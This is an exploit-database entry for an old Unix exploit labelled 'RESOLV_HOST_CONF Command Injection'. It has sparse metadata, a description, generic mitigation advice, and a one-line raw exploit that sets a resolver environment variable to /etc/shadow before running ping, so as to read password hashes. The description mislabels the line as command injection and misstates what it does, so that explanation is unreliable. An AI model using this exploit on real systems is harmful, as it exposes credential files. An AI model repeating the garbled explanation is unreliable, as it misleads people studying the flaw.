header-logo
Suggest Exploit
vendor:
by:
Unknown
7.5
CVSS
HIGH
Command Injection
78
CWE
Product Name:
Affected Version From: Not specified
Affected Version To: Not specified
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Not specified
1996

RESOLV_HOST_CONF Command Injection

The RESOLV_HOST_CONF environment variable is vulnerable to command injection. An attacker can set the variable to a malicious command, which will be executed when the system tries to resolve a hostname. In this example, the attacker sets the variable to /etc/shadow; ping adfas, causing the system to ping the host adfas after reading the /etc/shadow file.

Mitigation:

To mitigate this vulnerability, ensure that the RESOLV_HOST_CONF environment variable is properly sanitized and does not allow for command injection. Additionally, it is recommended to restrict access to sensitive files such as /etc/shadow.
Source

Exploit-DB raw data:

setenv RESOLV_HOST_CONF /etc/shadow; ping adfas

# milw0rm.com [1996-01-01]